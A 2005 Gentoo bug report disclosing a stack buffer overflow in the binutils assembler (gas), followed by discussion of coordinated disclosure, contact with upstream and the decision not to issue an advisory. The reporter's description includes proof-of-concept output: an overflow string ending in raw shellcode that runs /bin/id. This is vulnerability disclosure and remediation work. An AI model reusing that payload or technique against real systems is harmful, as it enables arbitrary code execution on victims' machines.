Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 99464 - sys-devel/binutils: buffer overflow in gas
Summary: sys-devel/binutils: buffer overflow in gas
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: Current packages (show other bugs)
Hardware: All Linux
: High minor (vote)
Assignee: Gentoo Toolchain Maintainers
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2005-07-18 14:33 UTC by Tavis Ormandy (RETIRED)
Modified: 2005-09-26 17:11 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments
PoC (gas-poc.sh,608 bytes, text/plain)
2005-07-18 14:34 UTC, Tavis Ormandy (RETIRED)
Details
patch (gas-messages-bof.diff,1.98 KB, patch)
2005-07-18 14:34 UTC, Tavis Ormandy (RETIRED)
Details | Diff

Note You need to log in before you can comment on or make changes to this bug.
Description Tavis Ormandy (RETIRED) gentoo-dev 2005-07-18 14:33:57 UTC
stack buffer overflow in gas, perhaps exploitable via distcc or tricking users 
to compile/assemple code.

$ gas-poc.sh > foo.c
$ gcc foo.c
/tmp/cc4hRCFg.s: Assembler messages:
/tmp/cc4hRCFg.s:13: Error: no such instruction: 
`aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Comment 1 Tavis Ormandy (RETIRED) gentoo-dev 2005-07-18 14:33:57 UTC
stack buffer overflow in gas, perhaps exploitable via distcc or tricking users 
to compile/assemple code.

$ gas-poc.sh > foo.c
$ gcc foo.c
/tmp/cc4hRCFg.s: Assembler messages:
/tmp/cc4hRCFg.s:13: Error: no such instruction: 
`aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÄêÿ¿1À°
f1Û1ÉÍë[1ÀCC
  °
   S
      Íèåÿÿÿ/bin/id'
uid=1000(taviso) gid=100(users) groups=5(tty),6(disk),10(wheel),16(cron),
19(cdrom),35(games),100(users),250(portage),407(mp3),408(mame)
/usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.5-20050130/../../../crt1.o(.text+0x18): 
In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status

PoC attached tested with sys-devel/binutils-2.15.92.0.2-r10, and patch that 
fixes this issue for me.
Comment 2 Tavis Ormandy (RETIRED) gentoo-dev 2005-07-18 14:34:20 UTC
Created attachment 63735 [details]
PoC
Comment 3 Tavis Ormandy (RETIRED) gentoo-dev 2005-07-18 14:34:33 UTC
Created attachment 63736 [details, diff]
patch
Comment 4 SpanKY gentoo-dev 2005-07-18 21:30:12 UTC
how exactly are we to proceed with this ?  the patch def looks good, but should
is something going to contact vuln-sec or should i just post the patch to
binutils mailing list (at which point keeping this bug closed is pointless) ?
Comment 5 Sune Kloppenborg Jeppesen gentoo-dev 2005-07-18 22:08:36 UTC
The plan is like this:  
1. Tigger/SpanKY/Solar please confirm  
2. Taviso please mail vendor-sec 
3. Arch security liaisons test 
4. Coordinated disclosure 
Comment 6 rob holland (RETIRED) gentoo-dev 2005-07-19 01:51:50 UTC
confirmed as stack overflow.

as: stack smashing attack in function as_bad()
Comment 7 SpanKY gentoo-dev 2005-07-19 06:02:24 UTC
erm i dont think the binutils guys may be on the vendor sec list ?  i could
e-mail  a handful of the big devs ...
Comment 8 Sune Kloppenborg Jeppesen gentoo-dev 2005-07-19 06:29:58 UTC
Vapier please do. (2a. Contact upstream) 
Comment 9 SpanKY gentoo-dev 2005-07-20 15:24:30 UTC
the binutils project does not wish to handle any offerflow/etc... issues in a
private manner

e-mailed the upstream dev list and it should be in shortly
Comment 10 Sune Kloppenborg Jeppesen gentoo-dev 2005-07-20 22:17:30 UTC
Toolchain please provide an updated ebuild. 
Comment 11 SpanKY gentoo-dev 2005-07-21 14:56:42 UTC
well there are plenty of other overflows/sanity check patches which have been added to binutils but i've opted to not add to our ebuild ...  as upstream says, they'd rather not treat overflows in binutils as regular vulnerabilities, so issuing a GLSA for this seems a bit overdown ...  also, they've accepted and committed the patch Taviso posted
Comment 12 Tavis Ormandy (RETIRED) gentoo-dev 2005-07-21 23:19:15 UTC
Agreed, not GLSA worthy (you'ld have to trick someone into compiling your source 
code, it doesnt seem too much of a leap to get them to execute it afterwards).

Do you think it's worth adding the patch to our package Spanky? 
Comment 13 Sune Kloppenborg Jeppesen gentoo-dev 2005-07-21 23:30:05 UTC
Rerating as B2. 
Comment 14 SpanKY gentoo-dev 2005-07-22 10:34:23 UTC
not really ... if i do this one, then i should go through all the other BFD
fixes that have been posted to the binutils mailing list in the last few months
since the 1.16.1 release ...
Comment 15 Thierry Carrez (RETIRED) gentoo-dev 2005-07-30 06:39:58 UTC
Even if we did some GLSAs in the past that required heavy social engineering
(read: dumb user) to work, I don't think we should continue on that trend. I
propose to downgrade this to simple bug status.

Security: please give your opinion.
Comment 16 Sune Kloppenborg Jeppesen gentoo-dev 2005-07-31 12:59:42 UTC
I agree. Reassigning to toolchain, keeping security on cc. 
Comment 17 SpanKY gentoo-dev 2005-09-26 17:11:26 UTC
should be all set now